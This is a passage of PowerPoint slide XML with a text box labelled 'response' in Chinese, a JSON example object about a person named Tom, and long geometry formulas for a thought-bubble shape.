            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7841512" y="5768657"/>
              <a:ext cx="486030" cy="275640"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr fontAlgn="auto">
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="12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响应</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="12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7" name="!!矩形: 圆角 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6307776" y="5509245"/>
            <a:ext cx="3458002" cy="214548"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 3261"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFE4"/>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zh-CN" sz="1200" b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"name"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"Tom"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"age"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0">
                <a:solidFill>
                  <a:srgbClr val="098658"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>20</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"gender"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"male"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200" b="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="18" name="组合 17"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7835398" y="3518675"/>
            <a:ext cx="2066053" cy="1923764"/>
            <a:chOff x="7835398" y="3518675"/>
            <a:chExt cx="2066053" cy="1923764"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="19" name="思想气泡: 云 23"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7835398" y="3518675"/>
              <a:ext cx="2066053" cy="1923764"/>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1" fmla="*/ 527047 w 1997080"/>
                <a:gd name="connsiteY0-2" fmla="*/ 1897153 h 1085539"/>
                <a:gd name="connsiteX1-3" fmla="*/ 496893 w 1997080"/>
                <a:gd name="connsiteY1-4" fmla="*/ 1927307 h 1085539"/>
                <a:gd name="connsiteX2-5" fmla="*/ 466739 w 1997080"/>
                <a:gd name="connsiteY2-6" fmla="*/ 1897153 h 1085539"/>
                <a:gd name="connsiteX3-7" fmla="*/ 496893 w 1997080"/>
                <a:gd name="connsiteY3-8" fmla="*/ 1866999 h 1085539"/>
                <a:gd name="connsiteX4-9" fmla="*/ 527047 w 1997080"/>
                <a:gd name="connsiteY4-10" fmla="*/ 1897153 h 1085539"/>
                <a:gd name="connsiteX0-11" fmla="*/ 651741 w 1997080"/>
                <a:gd name="connsiteY0-12" fmla="*/ 1641907 h 1085539"/>
                <a:gd name="connsiteX1-13" fmla="*/ 591433 w 1997080"/>
                <a:gd name="connsiteY1-14" fmla="*/ 1702215 h 1085539"/>
                <a:gd name="connsiteX2-15" fmla="*/ 531125 w 1997080"/>
                <a:gd name="connsiteY2-16" fmla="*/ 1641907 h 1085539"/>
                <a:gd name="connsiteX3-17" fmla="*/ 591433 w 1997080"/>
                <a:gd name="connsiteY3-18" fmla="*/ 1581599 h 1085539"/>
                <a:gd name="connsiteX4-19" fmla="*/ 651741 w 1997080"/>
                <a:gd name="connsiteY4-20" fmla="*/ 1641907 h 1085539"/>
                <a:gd name="connsiteX0-21" fmla="*/ 797381 w 1997080"/>
                <a:gd name="connsiteY0-22" fmla="*/ 1330108 h 1085539"/>
                <a:gd name="connsiteX1-23" fmla="*/ 706919 w 1997080"/>
                <a:gd name="connsiteY1-24" fmla="*/ 1420570 h 1085539"/>
                <a:gd name="connsiteX2-25" fmla="*/ 616457 w 1997080"/>
                <a:gd name="connsiteY2-26" fmla="*/ 1330108 h 1085539"/>
                <a:gd name="connsiteX3-27" fmla="*/ 706919 w 1997080"/>
                <a:gd name="connsiteY3-28" fmla="*/ 1239646 h 1085539"/>
                <a:gd name="connsiteX4-29" fmla="*/ 797381 w 1997080"/>
                <a:gd name="connsiteY4-30" fmla="*/ 1330108 h 1085539"/>
                <a:gd name="connsiteX0-31" fmla="*/ 4693 w 43200"/>
                <a:gd name="connsiteY0-32" fmla="*/ 26177 h 43200"/>
                <a:gd name="connsiteX1-33" fmla="*/ 2160 w 43200"/>
                <a:gd name="connsiteY1-34" fmla="*/ 25380 h 43200"/>
                <a:gd name="connsiteX2-35" fmla="*/ 6928 w 43200"/>
                <a:gd name="connsiteY2-36" fmla="*/ 34899 h 43200"/>
                <a:gd name="connsiteX3-37" fmla="*/ 5820 w 43200"/>
                <a:gd name="connsiteY3-38" fmla="*/ 35280 h 43200"/>
                <a:gd name="connsiteX4-39" fmla="*/ 16478 w 43200"/>
                <a:gd name="connsiteY4-40" fmla="*/ 39090 h 43200"/>
                <a:gd name="connsiteX5-41" fmla="*/ 15810 w 43200"/>
                <a:gd name="connsiteY5-42" fmla="*/ 37350 h 43200"/>
                <a:gd name="connsiteX6-43" fmla="*/ 28827 w 43200"/>
                <a:gd name="connsiteY6-44" fmla="*/ 34751 h 43200"/>
                <a:gd name="connsiteX7-45" fmla="*/ 28560 w 43200"/>
                <a:gd name="connsiteY7-46" fmla="*/ 36660 h 43200"/>
                <a:gd name="connsiteX8-47" fmla="*/ 34129 w 43200"/>
                <a:gd name="connsiteY8-48" fmla="*/ 22954 h 43200"/>
                <a:gd name="connsiteX9-49" fmla="*/ 37380 w 43200"/>
                <a:gd name="connsiteY9-50" fmla="*/ 30090 h 43200"/>
                <a:gd name="connsiteX10-51" fmla="*/ 41798 w 43200"/>
                <a:gd name="connsiteY10-52" fmla="*/ 15354 h 43200"/>
                <a:gd name="connsiteX11-53" fmla="*/ 40350 w 43200"/>
                <a:gd name="connsiteY11-54" fmla="*/ 18030 h 43200"/>
                <a:gd name="connsiteX12-55" fmla="*/ 38324 w 43200"/>
                <a:gd name="connsiteY12-56" fmla="*/ 5426 h 43200"/>
                <a:gd name="connsiteX13-57" fmla="*/ 38400 w 43200"/>
                <a:gd name="connsiteY13-58" fmla="*/ 6690 h 43200"/>
                <a:gd name="connsiteX14-59" fmla="*/ 29078 w 43200"/>
                <a:gd name="connsiteY14-60" fmla="*/ 3952 h 43200"/>
                <a:gd name="connsiteX15-61" fmla="*/ 29820 w 43200"/>
                <a:gd name="connsiteY15-62" fmla="*/ 2340 h 43200"/>
                <a:gd name="connsiteX16-63" fmla="*/ 22141 w 43200"/>
                <a:gd name="connsiteY16-64" fmla="*/ 4720 h 43200"/>
                <a:gd name="connsiteX17-65" fmla="*/ 22500 w 43200"/>
                <a:gd name="connsiteY17-66" fmla="*/ 3330 h 43200"/>
                <a:gd name="connsiteX18-67" fmla="*/ 14000 w 43200"/>
                <a:gd name="connsiteY18-68" fmla="*/ 5192 h 43200"/>
                <a:gd name="connsiteX19-69" fmla="*/ 15300 w 43200"/>
                <a:gd name="connsiteY19-70" fmla="*/ 6540 h 43200"/>
                <a:gd name="connsiteX20-71" fmla="*/ 4127 w 43200"/>
                <a:gd name="connsiteY20-72" fmla="*/ 15789 h 43200"/>
                <a:gd name="connsiteX21-73" fmla="*/ 3900 w 43200"/>
                <a:gd name="connsiteY21-74" fmla="*/ 14370 h 43200"/>
                <a:gd name="connsiteX0-75" fmla="*/ 3936 w 43256"/>
                <a:gd name="connsiteY0-76" fmla="*/ 14229 h 76558"/>
                <a:gd name="connsiteX1-77" fmla="*/ 5659 w 43256"/>
                <a:gd name="connsiteY1-78" fmla="*/ 6766 h 76558"/>
                <a:gd name="connsiteX2-79" fmla="*/ 14041 w 43256"/>
                <a:gd name="connsiteY2-80" fmla="*/ 5061 h 76558"/>
                <a:gd name="connsiteX3-81" fmla="*/ 22492 w 43256"/>
                <a:gd name="connsiteY3-82" fmla="*/ 3291 h 76558"/>
                <a:gd name="connsiteX4-83" fmla="*/ 25785 w 43256"/>
                <a:gd name="connsiteY4-84" fmla="*/ 59 h 76558"/>
                <a:gd name="connsiteX5-85" fmla="*/ 29869 w 43256"/>
                <a:gd name="connsiteY5-86" fmla="*/ 2340 h 76558"/>
                <a:gd name="connsiteX6-87" fmla="*/ 35499 w 43256"/>
                <a:gd name="connsiteY6-88" fmla="*/ 549 h 76558"/>
                <a:gd name="connsiteX7-89" fmla="*/ 38354 w 43256"/>
                <a:gd name="connsiteY7-90" fmla="*/ 5435 h 76558"/>
                <a:gd name="connsiteX8-91" fmla="*/ 42018 w 43256"/>
                <a:gd name="connsiteY8-92" fmla="*/ 10177 h 76558"/>
                <a:gd name="connsiteX9-93" fmla="*/ 41854 w 43256"/>
                <a:gd name="connsiteY9-94" fmla="*/ 15319 h 76558"/>
                <a:gd name="connsiteX10-95" fmla="*/ 43052 w 43256"/>
                <a:gd name="connsiteY10-96" fmla="*/ 23181 h 76558"/>
                <a:gd name="connsiteX11-97" fmla="*/ 37440 w 43256"/>
                <a:gd name="connsiteY11-98" fmla="*/ 30063 h 76558"/>
                <a:gd name="connsiteX12-99" fmla="*/ 35431 w 43256"/>
                <a:gd name="connsiteY12-100" fmla="*/ 35960 h 76558"/>
                <a:gd name="connsiteX13-101" fmla="*/ 28591 w 43256"/>
                <a:gd name="connsiteY13-102" fmla="*/ 36674 h 76558"/>
                <a:gd name="connsiteX14-103" fmla="*/ 23703 w 43256"/>
                <a:gd name="connsiteY14-104" fmla="*/ 42965 h 76558"/>
                <a:gd name="connsiteX15-105" fmla="*/ 16516 w 43256"/>
                <a:gd name="connsiteY15-106" fmla="*/ 39125 h 76558"/>
                <a:gd name="connsiteX16-107" fmla="*/ 5840 w 43256"/>
                <a:gd name="connsiteY16-108" fmla="*/ 35331 h 76558"/>
                <a:gd name="connsiteX17-109" fmla="*/ 1146 w 43256"/>
                <a:gd name="connsiteY17-110" fmla="*/ 31109 h 76558"/>
                <a:gd name="connsiteX18-111" fmla="*/ 2149 w 43256"/>
                <a:gd name="connsiteY18-112" fmla="*/ 25410 h 76558"/>
                <a:gd name="connsiteX19-113" fmla="*/ 31 w 43256"/>
                <a:gd name="connsiteY19-114" fmla="*/ 19563 h 76558"/>
                <a:gd name="connsiteX20-115" fmla="*/ 3899 w 43256"/>
                <a:gd name="connsiteY20-116" fmla="*/ 14366 h 76558"/>
                <a:gd name="connsiteX21-117" fmla="*/ 3936 w 43256"/>
                <a:gd name="connsiteY21-118" fmla="*/ 14229 h 76558"/>
                <a:gd name="connsiteX0-119" fmla="*/ 528711 w 1999669"/>
                <a:gd name="connsiteY0-120" fmla="*/ 1893610 h 1923764"/>
                <a:gd name="connsiteX1-121" fmla="*/ 498557 w 1999669"/>
                <a:gd name="connsiteY1-122" fmla="*/ 1923764 h 1923764"/>
                <a:gd name="connsiteX2-123" fmla="*/ 468403 w 1999669"/>
                <a:gd name="connsiteY2-124" fmla="*/ 1893610 h 1923764"/>
                <a:gd name="connsiteX3-125" fmla="*/ 498557 w 1999669"/>
                <a:gd name="connsiteY3-126" fmla="*/ 1863456 h 1923764"/>
                <a:gd name="connsiteX4-127" fmla="*/ 528711 w 1999669"/>
                <a:gd name="connsiteY4-128" fmla="*/ 1893610 h 1923764"/>
                <a:gd name="connsiteX0-129" fmla="*/ 653405 w 1999669"/>
                <a:gd name="connsiteY0-130" fmla="*/ 1638364 h 1923764"/>
                <a:gd name="connsiteX1-131" fmla="*/ 593097 w 1999669"/>
                <a:gd name="connsiteY1-132" fmla="*/ 1698672 h 1923764"/>
                <a:gd name="connsiteX2-133" fmla="*/ 532789 w 1999669"/>
                <a:gd name="connsiteY2-134" fmla="*/ 1638364 h 1923764"/>
                <a:gd name="connsiteX3-135" fmla="*/ 593097 w 1999669"/>
                <a:gd name="connsiteY3-136" fmla="*/ 1578056 h 1923764"/>
                <a:gd name="connsiteX4-137" fmla="*/ 653405 w 1999669"/>
                <a:gd name="connsiteY4-138" fmla="*/ 1638364 h 1923764"/>
                <a:gd name="connsiteX0-139" fmla="*/ 799045 w 1999669"/>
                <a:gd name="connsiteY0-140" fmla="*/ 1326565 h 1923764"/>
                <a:gd name="connsiteX1-141" fmla="*/ 708583 w 1999669"/>
                <a:gd name="connsiteY1-142" fmla="*/ 1417027 h 1923764"/>
                <a:gd name="connsiteX2-143" fmla="*/ 618121 w 1999669"/>
                <a:gd name="connsiteY2-144" fmla="*/ 1326565 h 1923764"/>
                <a:gd name="connsiteX3-145" fmla="*/ 708583 w 1999669"/>
                <a:gd name="connsiteY3-146" fmla="*/ 1236103 h 1923764"/>
                <a:gd name="connsiteX4-147" fmla="*/ 799045 w 1999669"/>
                <a:gd name="connsiteY4-148" fmla="*/ 1326565 h 1923764"/>
                <a:gd name="connsiteX0-149" fmla="*/ 4729 w 43256"/>
                <a:gd name="connsiteY0-150" fmla="*/ 26036 h 76558"/>
                <a:gd name="connsiteX1-151" fmla="*/ 2196 w 43256"/>
                <a:gd name="connsiteY1-152" fmla="*/ 25239 h 76558"/>
                <a:gd name="connsiteX2-153" fmla="*/ 6964 w 43256"/>
                <a:gd name="connsiteY2-154" fmla="*/ 34758 h 76558"/>
                <a:gd name="connsiteX3-155" fmla="*/ 5856 w 43256"/>
                <a:gd name="connsiteY3-156" fmla="*/ 35139 h 76558"/>
                <a:gd name="connsiteX4-157" fmla="*/ 16514 w 43256"/>
                <a:gd name="connsiteY4-158" fmla="*/ 38949 h 76558"/>
                <a:gd name="connsiteX5-159" fmla="*/ 15846 w 43256"/>
                <a:gd name="connsiteY5-160" fmla="*/ 37209 h 76558"/>
                <a:gd name="connsiteX6-161" fmla="*/ 29814 w 43256"/>
                <a:gd name="connsiteY6-162" fmla="*/ 39159 h 76558"/>
                <a:gd name="connsiteX7-163" fmla="*/ 28596 w 43256"/>
                <a:gd name="connsiteY7-164" fmla="*/ 36519 h 76558"/>
                <a:gd name="connsiteX8-165" fmla="*/ 34165 w 43256"/>
                <a:gd name="connsiteY8-166" fmla="*/ 22813 h 76558"/>
                <a:gd name="connsiteX9-167" fmla="*/ 37416 w 43256"/>
                <a:gd name="connsiteY9-168" fmla="*/ 29949 h 76558"/>
                <a:gd name="connsiteX10-169" fmla="*/ 41834 w 43256"/>
                <a:gd name="connsiteY10-170" fmla="*/ 15213 h 76558"/>
                <a:gd name="connsiteX11-171" fmla="*/ 40386 w 43256"/>
                <a:gd name="connsiteY11-172" fmla="*/ 17889 h 76558"/>
                <a:gd name="connsiteX12-173" fmla="*/ 38360 w 43256"/>
                <a:gd name="connsiteY12-174" fmla="*/ 5285 h 76558"/>
                <a:gd name="connsiteX13-175" fmla="*/ 38436 w 43256"/>
                <a:gd name="connsiteY13-176" fmla="*/ 6549 h 76558"/>
                <a:gd name="connsiteX14-177" fmla="*/ 29114 w 43256"/>
                <a:gd name="connsiteY14-178" fmla="*/ 3811 h 76558"/>
                <a:gd name="connsiteX15-179" fmla="*/ 29856 w 43256"/>
                <a:gd name="connsiteY15-180" fmla="*/ 2199 h 76558"/>
                <a:gd name="connsiteX16-181" fmla="*/ 22177 w 43256"/>
                <a:gd name="connsiteY16-182" fmla="*/ 4579 h 76558"/>
                <a:gd name="connsiteX17-183" fmla="*/ 22536 w 43256"/>
                <a:gd name="connsiteY17-184" fmla="*/ 3189 h 76558"/>
                <a:gd name="connsiteX18-185" fmla="*/ 14036 w 43256"/>
                <a:gd name="connsiteY18-186" fmla="*/ 5051 h 76558"/>
                <a:gd name="connsiteX19-187" fmla="*/ 15336 w 43256"/>
                <a:gd name="connsiteY19-188" fmla="*/ 6399 h 76558"/>
                <a:gd name="connsiteX20-189" fmla="*/ 4163 w 43256"/>
                <a:gd name="connsiteY20-190" fmla="*/ 15648 h 76558"/>
                <a:gd name="connsiteX21-191" fmla="*/ 3936 w 43256"/>
                <a:gd name="connsiteY21-192" fmla="*/ 14229 h 76558"/>
                <a:gd name="connsiteX0-193" fmla="*/ 3936 w 43256"/>
                <a:gd name="connsiteY0-194" fmla="*/ 14229 h 76558"/>
                <a:gd name="connsiteX1-195" fmla="*/ 5659 w 43256"/>
                <a:gd name="connsiteY1-196" fmla="*/ 6766 h 76558"/>
                <a:gd name="connsiteX2-197" fmla="*/ 14041 w 43256"/>
                <a:gd name="connsiteY2-198" fmla="*/ 5061 h 76558"/>
                <a:gd name="connsiteX3-199" fmla="*/ 22492 w 43256"/>
                <a:gd name="connsiteY3-200" fmla="*/ 3291 h 76558"/>
                <a:gd name="connsiteX4-201" fmla="*/ 25785 w 43256"/>
                <a:gd name="connsiteY4-202" fmla="*/ 59 h 76558"/>
                <a:gd name="connsiteX5-203" fmla="*/ 29869 w 43256"/>
                <a:gd name="connsiteY5-204" fmla="*/ 2340 h 76558"/>
                <a:gd name="connsiteX6-205" fmla="*/ 35499 w 43256"/>
                <a:gd name="connsiteY6-206" fmla="*/ 549 h 76558"/>
                <a:gd name="connsiteX7-207" fmla="*/ 38354 w 43256"/>
                <a:gd name="connsiteY7-208" fmla="*/ 5435 h 76558"/>
                <a:gd name="connsiteX8-209" fmla="*/ 42018 w 43256"/>
                <a:gd name="connsiteY8-210" fmla="*/ 10177 h 76558"/>
                <a:gd name="connsiteX9-211" fmla="*/ 41854 w 43256"/>
                <a:gd name="connsiteY9-212" fmla="*/ 15319 h 76558"/>
                <a:gd name="connsiteX10-213" fmla="*/ 43052 w 43256"/>
                <a:gd name="connsiteY10-214" fmla="*/ 23181 h 76558"/>
                <a:gd name="connsiteX11-215" fmla="*/ 37440 w 43256"/>
                <a:gd name="connsiteY11-216" fmla="*/ 30063 h 76558"/>
                <a:gd name="connsiteX12-217" fmla="*/ 35431 w 43256"/>
                <a:gd name="connsiteY12-218" fmla="*/ 35960 h 76558"/>
                <a:gd name="connsiteX13-219" fmla="*/ 28591 w 43256"/>
                <a:gd name="connsiteY13-220" fmla="*/ 36674 h 76558"/>
                <a:gd name="connsiteX14-221" fmla="*/ 23703 w 43256"/>
                <a:gd name="connsiteY14-222" fmla="*/ 42965 h 76558"/>
                <a:gd name="connsiteX15-223" fmla="*/ 16516 w 43256"/>
                <a:gd name="connsiteY15-224" fmla="*/ 39125 h 76558"/>
                <a:gd name="connsiteX16-225" fmla="*/ 5840 w 43256"/>
                <a:gd name="connsiteY16-226" fmla="*/ 35331 h 76558"/>
                <a:gd name="connsiteX17-227" fmla="*/ 1146 w 43256"/>
                <a:gd name="connsiteY17-228" fmla="*/ 31109 h 76558"/>
                <a:gd name="connsiteX18-229" fmla="*/ 2149 w 43256"/>
                <a:gd name="connsiteY18-230" fmla="*/ 25410 h 76558"/>
                <a:gd name="connsiteX19-231" fmla="*/ 31 w 43256"/>
                <a:gd name="connsiteY19-232" fmla="*/ 19563 h 76558"/>
                <a:gd name="connsiteX20-233" fmla="*/ 3899 w 43256"/>
                <a:gd name="connsiteY20-234" fmla="*/ 14366 h 76558"/>
                <a:gd name="connsiteX21-235" fmla="*/ 3936 w 43256"/>
                <a:gd name="connsiteY21-236" fmla="*/ 14229 h 76558"/>
                <a:gd name="connsiteX0-237" fmla="*/ 528711 w 1999669"/>
                <a:gd name="connsiteY0-238" fmla="*/ 1893610 h 1923764"/>
                <a:gd name="connsiteX1-239" fmla="*/ 498557 w 1999669"/>
                <a:gd name="connsiteY1-240" fmla="*/ 1923764 h 1923764"/>
                <a:gd name="connsiteX2-241" fmla="*/ 468403 w 1999669"/>
                <a:gd name="connsiteY2-242" fmla="*/ 1893610 h 1923764"/>
                <a:gd name="connsiteX3-243" fmla="*/ 498557 w 1999669"/>
                <a:gd name="connsiteY3-244" fmla="*/ 1863456 h 1923764"/>
                <a:gd name="connsiteX4-245" fmla="*/ 528711 w 1999669"/>
                <a:gd name="connsiteY4-246" fmla="*/ 1893610 h 1923764"/>
                <a:gd name="connsiteX0-247" fmla="*/ 653405 w 1999669"/>
                <a:gd name="connsiteY0-248" fmla="*/ 1638364 h 1923764"/>
                <a:gd name="connsiteX1-249" fmla="*/ 593097 w 1999669"/>
                <a:gd name="connsiteY1-250" fmla="*/ 1698672 h 1923764"/>
                <a:gd name="connsiteX2-251" fmla="*/ 532789 w 1999669"/>
                <a:gd name="connsiteY2-252" fmla="*/ 1638364 h 1923764"/>
                <a:gd name="connsiteX3-253" fmla="*/ 593097 w 1999669"/>
                <a:gd name="connsiteY3-254" fmla="*/ 1578056 h 1923764"/>
                <a:gd name="connsiteX4-255" fmla="*/ 653405 w 1999669"/>
                <a:gd name="connsiteY4-256" fmla="*/ 1638364 h 1923764"/>
                <a:gd name="connsiteX0-257" fmla="*/ 799045 w 1999669"/>
                <a:gd name="connsiteY0-258" fmla="*/ 1326565 h 1923764"/>
                <a:gd name="connsiteX1-259" fmla="*/ 708583 w 1999669"/>
                <a:gd name="connsiteY1-260" fmla="*/ 1417027 h 1923764"/>
                <a:gd name="connsiteX2-261" fmla="*/ 618121 w 1999669"/>
                <a:gd name="connsiteY2-262" fmla="*/ 1326565 h 1923764"/>
                <a:gd name="connsiteX3-263" fmla="*/ 708583 w 1999669"/>
                <a:gd name="connsiteY3-264" fmla="*/ 1236103 h 1923764"/>
                <a:gd name="connsiteX4-265" fmla="*/ 799045 w 1999669"/>
                <a:gd name="connsiteY4-266" fmla="*/ 1326565 h 1923764"/>
                <a:gd name="connsiteX0-267" fmla="*/ 4729 w 43256"/>
                <a:gd name="connsiteY0-268" fmla="*/ 26036 h 76558"/>
                <a:gd name="connsiteX1-269" fmla="*/ 2196 w 43256"/>
                <a:gd name="connsiteY1-270" fmla="*/ 25239 h 76558"/>
                <a:gd name="connsiteX2-271" fmla="*/ 6964 w 43256"/>
                <a:gd name="connsiteY2-272" fmla="*/ 34758 h 76558"/>
                <a:gd name="connsiteX3-273" fmla="*/ 5856 w 43256"/>
                <a:gd name="connsiteY3-274" fmla="*/ 35139 h 76558"/>
                <a:gd name="connsiteX4-275" fmla="*/ 16514 w 43256"/>
                <a:gd name="connsiteY4-276" fmla="*/ 38949 h 76558"/>
                <a:gd name="connsiteX5-277" fmla="*/ 15846 w 43256"/>
                <a:gd name="connsiteY5-278" fmla="*/ 37209 h 76558"/>
                <a:gd name="connsiteX6-279" fmla="*/ 29814 w 43256"/>
                <a:gd name="connsiteY6-280" fmla="*/ 39159 h 76558"/>
                <a:gd name="connsiteX7-281" fmla="*/ 28406 w 43256"/>
                <a:gd name="connsiteY7-282" fmla="*/ 40718 h 76558"/>
                <a:gd name="connsiteX8-283" fmla="*/ 34165 w 43256"/>
                <a:gd name="connsiteY8-284" fmla="*/ 22813 h 76558"/>
                <a:gd name="connsiteX9-285" fmla="*/ 37416 w 43256"/>
                <a:gd name="connsiteY9-286" fmla="*/ 29949 h 76558"/>
                <a:gd name="connsiteX10-287" fmla="*/ 41834 w 43256"/>
                <a:gd name="connsiteY10-288" fmla="*/ 15213 h 76558"/>
                <a:gd name="connsiteX11-289" fmla="*/ 40386 w 43256"/>
                <a:gd name="connsiteY11-290" fmla="*/ 17889 h 76558"/>
                <a:gd name="connsiteX12-291" fmla="*/ 38360 w 43256"/>
                <a:gd name="connsiteY12-292" fmla="*/ 5285 h 76558"/>
                <a:gd name="connsiteX13-293" fmla="*/ 38436 w 43256"/>
                <a:gd name="connsiteY13-294" fmla="*/ 6549 h 76558"/>
                <a:gd name="connsiteX14-295" fmla="*/ 29114 w 43256"/>
                <a:gd name="connsiteY14-296" fmla="*/ 3811 h 76558"/>
                <a:gd name="connsiteX15-297" fmla="*/ 29856 w 43256"/>
                <a:gd name="connsiteY15-298" fmla="*/ 2199 h 76558"/>
                <a:gd name="connsiteX16-299" fmla="*/ 22177 w 43256"/>
                <a:gd name="connsiteY16-300" fmla="*/ 4579 h 76558"/>
                <a:gd name="connsiteX17-301" fmla="*/ 22536 w 43256"/>
                <a:gd name="connsiteY17-302" fmla="*/ 3189 h 76558"/>
                <a:gd name="connsiteX18-303" fmla="*/ 14036 w 43256"/>
                <a:gd name="connsiteY18-304" fmla="*/ 5051 h 76558"/>
                <a:gd name="connsiteX19-305" fmla="*/ 15336 w 43256"/>
                <a:gd name="connsiteY19-306" fmla="*/ 6399 h 76558"/>
                <a:gd name="connsiteX20-307" fmla="*/ 4163 w 43256"/>
                <a:gd name="connsiteY20-308" fmla="*/ 15648 h 76558"/>
                <a:gd name="connsiteX21-309" fmla="*/ 3936 w 43256"/>
                <a:gd name="connsiteY21-310" fmla="*/ 14229 h 76558"/>
                <a:gd name="connsiteX0-311" fmla="*/ 3936 w 43256"/>
                <a:gd name="connsiteY0-312" fmla="*/ 14229 h 76558"/>
                <a:gd name="connsiteX1-313" fmla="*/ 5659 w 43256"/>
                <a:gd name="connsiteY1-314" fmla="*/ 6766 h 76558"/>
                <a:gd name="connsiteX2-315" fmla="*/ 14041 w 43256"/>
                <a:gd name="connsiteY2-316" fmla="*/ 5061 h 76558"/>
                <a:gd name="connsiteX3-317" fmla="*/ 22492 w 43256"/>
                <a:gd name="connsiteY3-318" fmla="*/ 3291 h 76558"/>
                <a:gd name="connsiteX4-319" fmla="*/ 25785 w 43256"/>
                <a:gd name="connsiteY4-320" fmla="*/ 59 h 76558"/>
                <a:gd name="connsiteX5-321" fmla="*/ 29869 w 43256"/>
